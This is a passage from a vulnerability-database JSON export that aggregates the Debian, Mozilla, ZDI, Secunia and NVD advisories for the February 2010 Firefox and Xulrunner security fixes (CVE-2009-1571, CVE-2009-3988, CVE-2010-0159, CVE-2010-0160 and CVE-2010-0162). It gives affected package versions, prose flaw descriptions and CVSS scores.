"5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs-dev_1.9.0.18-1_i386.deb", "packageName": "libmozjs-dev", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-dev_1.9.0.18-1_powerpc.deb", "packageName": "xulrunner-dev", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-dbg_1.9.0.18-1_i386.deb", "packageName": "xulrunner-1.9-dbg", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-dev_1.9.0.18-1_i386.deb", "packageName": "xulrunner-dev", "arch": "i686", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-dbg_1.9.0.18-1_powerpc.deb", "packageName": "xulrunner-1.9-dbg", "arch": "ppc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.18-1_s390.deb", "packageName": "xulrunner-1.9-gnome-support", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d-dbg_1.9.0.18-1_mips.deb", "packageName": "libmozjs1d-dbg", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d-dbg_1.9.0.18-1_arm.deb", "packageName": "libmozjs1d-dbg", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs-dev_1.9.0.18-1_mips.deb", "packageName": "libmozjs-dev", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d_1.9.0.18-1_arm.deb", "packageName": "libmozjs1d", "arch": "arm", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9_1.9.0.18-1_ia64.deb", "packageName": "xulrunner-1.9", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "python-xpcom_1.9.0.18-1_ia64.deb", "packageName": "python-xpcom", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "spidermonkey-bin_1.9.0.18-1_s390.deb", "packageName": "spidermonkey-bin", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-1.9-gnome-support_1.9.0.18-1_sparc.deb", "packageName": "xulrunner-1.9-gnome-support", "arch": "sparc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "spidermonkey-bin_1.9.0.18-1_ia64.deb", "packageName": "spidermonkey-bin", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d_1.9.0.18-1_ia64.deb", "packageName": "libmozjs1d", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-dev_1.9.0.18-1_mips.deb", "packageName": "xulrunner-dev", "arch": "mips", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "xulrunner-dev_1.9.0.18-1_ia64.deb", "packageName": "xulrunner-dev", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d_1.9.0.18-1_amd64.deb", "packageName": "libmozjs1d", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozillainterfaces-java_1.9.0.18-1_all.deb", "packageName": "libmozillainterfaces-java", "arch": "all", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "1.9.0.18-1", "packageFilename": "libmozjs1d_1.9.0.18-1_i386.deb", "packageName": "libmozjs1d", "arch": "i686", "operator": "lt"}], "edition": 1, "description": "Several remote vulnerabilities have been discovered in Xulrunner, a runtime environment for XUL applications, such as the Iceweasel web browser. The Common Vulnerabilities and Exposures project identifies the following problems:\n\n * [CVE-2009-1571](<https://security-tracker.debian.org/tracker/CVE-2009-1571>)\n\nAlin Rad Pop discovered that incorrect memory handling in the HTML parser could lead to the execution of arbitrary code.\n\n * [CVE-2009-3988](<https://security-tracker.debian.org/tracker/CVE-2009-3988>)\n\nHidetake Jo discovered that the same-origin policy can be bypassed through window.dialogArguments.\n\n * [CVE-2010-0159](<https://security-tracker.debian.org/tracker/CVE-2010-0159>)\n\nHenri Sivonen, Boris Zbarsky, Zack Weinberg, Bob Clary, Martijn Wargers and Paul Nickerson reported crashes in layout engine, which might allow the execution of arbitrary code.\n\n * [CVE-2010-0160](<https://security-tracker.debian.org/tracker/CVE-2010-0160>)\n\nOrlando Barrera II discovered that incorrect memory handling in the implementation of the web worker API could lead to the execution of arbitrary code.\n\n * [CVE-2010-0162](<https://security-tracker.debian.org/tracker/CVE-2010-0162>)\n\nGeorgi Guninski discovered that the same origin policy can be bypassed through specially crafted SVG documents.\n\nFor the stable distribution (lenny), these problems have been fixed in version 1.9.0.18-1.\n\nFor the unstable distribution (sid), these problems have been fixed in version 1.9.1.8-1.\n\nWe recommend that you upgrade your xulrunner packages.", "reporter": "Debian", "published": "2010-02-18T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "xulrunner -- several vulnerabilities", "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2010-02-18T00:00:00", "href": "http://www.debian.org/security/dsa-1999", "id": "DSA-1999", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:35", "references": ["https://vulners.com/securityvulns/securityvulns:doc:23279", "https://vulners.com/securityvulns/securityvulns:doc:23257", "https://vulners.com/securityvulns/securityvulns:doc:23252", "https://vulners.com/securityvulns/securityvulns:doc:23255", "https://vulners.com/securityvulns/securityvulns:doc:23256", "https://vulners.com/securityvulns/securityvulns:doc:23254", "https://vulners.com/securityvulns/securityvulns:doc:23253"], "description": "Multiple memory corruptions, use-after-free, crossite scripting.", "edition": 1, "reporter": "MOZILLA", "published": "2010-02-25T00:00:00", "title": "Mozilla Firefox / Thunderbird / SeaMonkey multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:35", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "Firefox", "version": "3.6", "operator": "eq"}, {"name": "SeaMonkey", "version": "2.0", "operator": "eq"}, {"name": "Firefox", "version": "3.0", "operator": "eq"}, {"name": "Thunderbird", "version": "3.0", "operator": "eq"}, {"name": "Firefox", "version": "3.5", "operator": "eq"}], "cvelist": ["CVE-2010-0160", "CVE-2009-1571", "CVE-2010-0159", "CVE-2010-0162", "CVE-2009-3988"], "modified": "2010-02-25T00:00:00", "id": "SECURITYVULNS:VULN:10631", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10631", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:33", "references": [], "description": "Mozilla Foundation Security Advisory 2010-04\r\n\r\nTitle: XSS due to window.dialogArguments being readable cross-domain\r\nImpact: Moderate\r\nAnnounced: February 17, 2010\r\nReporter: Hidetake Jo, TippingPoint ZDI\r\nProducts: Firefox, SeaMonkey\r\n\r\nFixed in: Firefox 3.6\r\n Firefox 3.5.8\r\n Firefox 3.0.18\r\n SeaMonkey 2.0.3\r\nDescription\r\n\r\nSecurity researcher Hidetake Jo of Microsoft Vulnerability Research reported that the properties set on an object passed to showModalDialog were readable by the document contained in the dialog, even when the document was from a different domain. This is a violation of the same-origin policy and could result in a website running untrusted JavaScript if it assumed the dialogArguments could not be initialized by another site.\r\n\r\nAn anonymous security researcher, via TippingPoint&#39;s Zero Day Initiative, also independently reported this issue to Mozilla.\r\nReferences\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=504862\r\n * CVE-2009-3988\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2010-02-19T00:00:00", "title": "Mozilla Foundation Security Advisory 2010-04", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:33", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-3988"], "modified": "2010-02-19T00:00:00", "id": "SECURITYVULNS:DOC:23255", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23255", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:33", "references": [], "description": "ZDI-10-019: Mozilla Firefox showModalDialog Cross-Domain Scripting Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-019\r\nFebruary 19, 2010\r\n\r\n-- CVE ID:\r\nCVE-2009-3988\r\n\r\n-- Affected Vendors:\r\nMozilla Firefox\r\n\r\n-- Affected Products:\r\nMozilla Firefox 3.0.x\r\n\r\n-- TippingPoint&#40;TM&#41; IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 8399. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to bypass specific script\r\nexecution enforcements on vulnerable installations of Mozilla Firefox.\r\nUser interaction is required to exploit this vulnerability in that the\r\ntarget must visit a malicious page.\r\n\r\nThe specific flaw exists in the lack of cross domain policy enforcement.\r\nThrough usage of the showModalDialog&#40;&#41; JavaScript method an attacker can\r\ngather sensitive information from another website. This vulnerability\r\ncan be exploited to obtain website credentials not originating from the\r\nattacking site.\r\n\r\n-- Vendor Response:\r\nMozilla Firefox has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://www.mozilla.org/security/announce/2010/mfsa2010-04.html\r\n\r\n-- Disclosure Timeline:\r\n2009-08-06 - Vulnerability reported to vendor\r\n2010-02-19 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative &#40;ZDI&#41;:\r\nEstablished by TippingPoint, The Zero Day Initiative &#40;ZDI&#41; represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors &#40;including competitors&#41; who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/", "edition": 1, "reporter": "Securityvulns", "published": "2010-02-25T00:00:00", "title": "ZDI-10-019: Mozilla Firefox showModalDialog Cross-Domain Scripting Vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:33", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-3988"], "modified": "2010-02-25T00:00:00", "id": "SECURITYVULNS:DOC:23279", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23279", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:33", "references": [], "description": "Mozilla Foundation Security Advisory 2010-05\r\n\r\nTitle: XSS hazard using SVG document and binary Content-Type\r\nImpact: Moderate\r\nAnnounced: February 17, 2010\r\nReporter: Georgi Guninski\r\nProducts: Firefox, SeaMonkey\r\n\r\nFixed in: Firefox 3.6\r\n Firefox 3.5.8\r\n Firefox 3.0.18\r\n SeaMonkey 2.0.3\r\nDescription\r\n\r\nMozilla security researcher Georgi Guninski reported that when a SVG document which is served with Content-Type: application/octet-stream is embedded into another document via an &lt;embed&gt; tag with type=&quot;image/svg+xml&quot;, the Content-Type is ignored and the SVG document is processed normally. A website which allows arbitrary binary data to be uploaded but which relies on Content-Type: application/octet-stream to prevent script execution could have such protection bypassed. An attacker could upload a SVG document containing JavaScript as a binary file to a website, embed the SVG document into a malicous page on another site, and gain access to the script environment from the SVG-serving site, bypassing the same-origin policy.\r\nReferences\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=455472\r\n * CVE-2010-0162\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2010-02-19T00:00:00", "title": "Mozilla Foundation Security Advisory 2010-05", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:33", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-0162"], "modified": "2010-02-19T00:00:00", "id": "SECURITYVULNS:DOC:23256", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23256", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:33", "references": [], "description": "Mozilla Foundation Security Advisory 2010-01\r\n\r\nTitle: Crashes with evidence of memory corruption &#40;rv:1.9.1.8/ 1.9.0.18&#41;\r\nImpact: Critical\r\nAnnounced: February 17, 2010\r\nReporter: Mozilla developers and community\r\nProducts: Firefox, Thunderbird, SeaMonkey\r\n\r\nFixed in: Firefox 3.6\r\n Firefox 3.5.8\r\n Firefox 3.0.18\r\n Thunderbird 3.0.2\r\n SeaMonkey 2.0.3\r\nDescription\r\n\r\nMozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code.\r\nWorkaround\r\n\r\nDisable JavaScript until a version containing these fixes can be installed.\r\nReferences\r\n\r\nHenri Sivonen, Boris Zbarsky, Zack Weinberg, Bob Clary, Martijn Wargers, and Paul Nickerson reported crashes in the browser engine.\r\n\r\n * Browser engine crashes - Firefox 3, Firefox 3.5\r\n * CVE-2010-0159\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2010-02-19T00:00:00", "title": "Mozilla Foundation Security Advisory 2010-01", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:33", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-0159"], "modified": "2010-02-19T00:00:00", "id": "SECURITYVULNS:DOC:23252", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23252", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:33", "references": [], "description": "====================================================================== \r\n\r\n Secunia Research 18/02/2010\r\n\r\n - Mozilla Firefox Memory Corruption Vulnerability -\r\n\r\n====================================================================== \r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nVendor&#39;s Description of Software.....................................3\r\nDescription of Vulnerability.........................................4\r\nSolution.............................................................5\r\nTime Table...........................................................6\r\nCredits..............................................................7\r\nReferences...........................................................8\r\nAbout Secunia........................................................9\r\nVerification........................................................10\r\n\r\n====================================================================== \r\n1&#41; Affected Software \r\n\r\n* Mozilla Firefox 3.0.15 and 3.5.4.\r\n\r\nNOTE: Other versions may also be affected.\r\n\r\n====================================================================== \r\n2&#41; Severity \r\n\r\nRating: Highly critical\r\nImpact: System access\r\nWhere: Remote\r\n\r\n====================================================================== \r\n3&#41; Vendor&#39;s Description of Software \r\n\r\n&quot;The award-winning Firefox Web browser has security, speed and new \r\nfeatures that will change the way you use the Web. Don\u2019t settle for \r\nanything less.&quot;\r\n\r\nProduct Link:\r\nhttp://www.mozilla.com/firefox/\r\n\r\n====================================================================== \r\n4&#41; Description of Vulnerability\r\n\r\nSecunia Research has discovered a vulnerability in Mozilla Firefox, \r\nwhich can be exploited by malicious people to compromise a user&#39;s \r\nsystem.\r\n\r\nThe vulnerability is caused by an error when handling out-of-memory \r\nconditions. This can be exploited to corrupt memory and execute \r\narbitrary code via a specially crafted web page.\r\n\r\n====================================================================== \r\n5&#41; Solution\r\n\r\nUpdate to version 3.0.18 or 3.5.8.\r\n\r\n====================================================================== \r\n6&#41; Time Table \r\n\r\n04/11/2009 - Vendor notified.\r\n04/11/2009 - Vendor response.\r\n18/02/2010 - Public disclosure.\r\n\r\n====================================================================== \r\n7&#41; Credits \r\n\r\nDiscovered by Alin Rad Pop, Secunia Research.\r\n\r\n====================================================================== \r\n8&#41; References\r\n\r\nThe Common Vulnerabilities and Exposures &#40;CVE&#41; project has assigned \r\nCVE-2009-1571 for the vulnerability.\r\n\r\n====================================================================== \r\n9&#41; About Secunia\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private \r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the \r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n====================================================================== \r\n10&#41; Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2009-45/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================", "edition": 1, "reporter": "Securityvulns", "published": "2010-02-19T00:00:00", "title": "Secunia Research: Mozilla Firefox Memory Corruption Vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:33", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-1571"], "modified": "2010-02-19T00:00:00", "id": "SECURITYVULNS:DOC:23257", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23257", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:33", "references": [], "description": "Mozilla Foundation Security Advisory 2010-03\r\n\r\nTitle: Use-after-free crash in HTML parser\r\nImpact: Critical\r\nAnnounced: February 17, 2010\r\nReporter: Alin Rad Pop\r\nProducts: Firefox, Thunderbird, SeaMonkey\r\n\r\nFixed in: Firefox 3.6\r\n Firefox 3.5.8\r\n Firefox 3.0.18\r\n Thunderbird 3.0.2\r\n SeaMonkey 2.0.3\r\nDescription\r\n\r\nSecurity researcher Alin Rad Pop of Secunia Research reported that the HTML parser incorrectly freed used memory when insufficient space was available to process remaining input. Under such circumstances, memory occupied by in-use objects was freed and could later be filled with attacker-controlled text. These conditions could result in the execution or arbitrary code if methods on the freed objects were subsequently called.\r\nReferences\r\n\r\n * https://bugzilla.mozilla.org/show_bug.cgi?id=526500\r\n * CVE-2009-1571\r\n * SA37242\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2010-02-19T00:00:00", "title": "Mozilla Foundation Security Advisory 2010-03", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:33", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2009-1571"], "modified": "2010-02-19T00:00:00", "id": "SECURITYVULNS:DOC:23254", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23254", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:34", "references": [], "description": "ZDI-10-046: Mozilla Firefox Web Worker Array Remote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-046\r\nApril 2, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-0160\r\n\r\n-- Affected Vendors:\r\nMozilla Firefox\r\n\r\n-- Affected Products:\r\nMozilla Firefox 3.6.x\r\n\r\n-- TippingPoint&#40;TM&#41; IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9619. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Mozilla Firefox. User interaction is\r\nrequired to exploit this vulnerability in that the target must visit a\r\nmalicious page.\r\n\r\nThe specific flaw exists within the implementation of web worker\r\nthreads. Due to mishandling the array data type while processing posted\r\nmessages, a web worker thread can be made to corrupt heap memory. An\r\nattacker can exploit this vulnerability to execute arbitrary code under\r\nthe context of the user running the browser.\r\n\r\n-- Vendor Response:\r\nMozilla Firefox has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://www.mozilla.org/security/announce/2010/mfsa2010-02.html\r\n\r\n-- Disclosure Timeline:\r\n2009-12-04 - Vulnerability reported to vendor\r\n2010-04-02 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Orlando Barrera II, SecTheory\r\n\r\n-- About the Zero Day Initiative &#40;ZDI&#41;:\r\nEstablished by TippingPoint, The Zero Day Initiative &#40;ZDI&#41; represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors &#40;including competitors&#41; who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "reporter": "Securityvulns", "published": "2010-04-06T00:00:00", "title": "ZDI-10-046: Mozilla Firefox Web Worker Array Remote Code Execution Vulnerability", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:34", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-0160"], "modified": "2010-04-06T00:00:00", "id": "SECURITYVULNS:DOC:23544", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23544", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:33", "references": [], "description": "Mozilla Foundation Security Advisory 2010-02\r\n\r\nTitle: Web Worker Array Handling Heap Corruption Vulnerability\r\nImpact: Critical\r\nAnnounced: February 17, 2010\r\nReporter: Orlando Barrera II\r\nProducts: Firefox, SeaMonkey\r\n\r\nFixed in: Firefox 3.6\r\n Firefox 3.5.8\r\n Firefox 3.0.18\r\n SeaMonkey 2.0.3\r\nDescription\r\n\r\nSecurity researcher Orlando Barrera II reported via TippingPoint&#39;s Zero Day Initiative that Mozilla&#39;s implementation of Web Workers contained an error in its handling of array data types when processing posted messages. This error could be used by an attacker to corrupt heap memory and crash the browser, potentially running arbitrary code on a victim&#39;s computer.\r\nWorkaround\r\n\r\nDisable JavaScript until a version containing these fixes can be installed.\r\nReferences\r\n\r\n * Web Worker crash bugs\r\n * CVE-2010-0160\r\n", "edition": 1, "reporter": "Securityvulns", "published": "2010-02-19T00:00:00", "title": "Mozilla Foundation Security Advisory 2010-02", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:10:33", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2010-0160"], "modified": "2010-02-19T00:00:00", "id": "SECURITYVULNS:DOC:23253", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23253", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2017-09-19T13:36:42", "references": ["http://www.mandriva.com/security/advisories?name=MDVSA-2010:042", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035426.html", "http://www.vupen.com/english/advisories/2010/0405", "http://lists.opensuse.org/opensuse-security-announce/2010-03/msg00001.html", "http://www.debian.org/security/2010/dsa-1999", "https://exchange.xforce.ibmcloud.com/vulnerabilities/56362", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035367.html", "http://lists.fedoraproject.org/pipermail/package-announce/2010-February/035346.html", "http://www.ubuntu.com/usn/USN-896-1", "http://www.mozilla.org/security/announce/2010/mfsa2010-04.html", "http://www.redhat.com/support/errata/RHSA-2010-0112.html", "http://www.ubuntu.com/usn/USN-895-1", "https://bugzilla.mozilla.org/show_bug.cgi?id=504862"], "description": "Mozilla Firefox 3.0.x before 3.0.18 and 3.5.x before 3.5.8, and SeaMonkey before 2.0.3, does not properly restrict read access to object properties in showModalDialog, which allows remote attackers to bypass the Same Origin Policy and conduct cross-site scripting (XSS) attacks via crafted dialogArguments values.", "edition": 3, "reporter": "NVD", "published": "2010-02-22T08:00:01", "title": "CVE-2009-3988", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:42", "vector": "NONE", "value": 4.3}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:8355", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8355"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-3988"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:9384", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:9384"}], "modified": "2017-09-18T21:29:52", "cpe": ["cpe:/a:mozilla:firefox:3.0.2", "cpe:/a:mozilla:firefox:3.5.6", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:firefox:3.0.12", "cpe:/a:mozilla:seamonkey:2.0:beta_2", "cpe:/a:mozilla:seamonkey:2.0:beta_1", "cpe:/a:mozilla:firefox:3.5.3", "cpe:/a:mozilla:firefox:3.0.4", "cpe:/a:mozilla:firefox:3.0.14", "cpe:/a:mozilla:seamonkey:2.0:rc1", "cpe:/a:mozilla:firefox:3.5.5", "cpe:/a:mozilla:firefox:3.0.5", "cpe:/a:mozilla:firefox:3.5.1", "cpe:/a:mozilla:seamonkey:2.0:rc2", "cpe:/a:mozilla:firefox:3.5.7", "cpe:/a:mozilla:firefox:3.0.9", "cpe:/a:mozilla:firefox:3.5", "cpe:/a:mozilla:seamonkey:2.0:alpha_3", "cpe:/a:mozilla:firefox:3.0.13", "cpe:/a:mozilla:firefox:3.0.11", "cpe:/a:mozilla:seamonkey:2.0:alpha_1", "cpe:/a:mozilla:firefox:3.0.3", "cpe:/a:mozilla:firefox:3.0.6", "cpe:/a:mozilla:firefox:3.0.15", "cpe:/a:mozilla:firefox:3.0.7", "cpe:/a:mozilla:seamonkey:2.0:alpha_2", "cpe:/a:mozilla:firefox:3.0", "cpe:/a:mozilla:firefox:3.0.10", "cpe:/a:mozilla:firefox:3.0.8", "cpe:/a:mozilla:firefox:3.0.1", "cpe:/a:mozilla:firefox:3.5.4", "cpe:/a:mozilla:firefox:3.5.2", "cpe:/a:mozilla:firefox:3.0.17"], 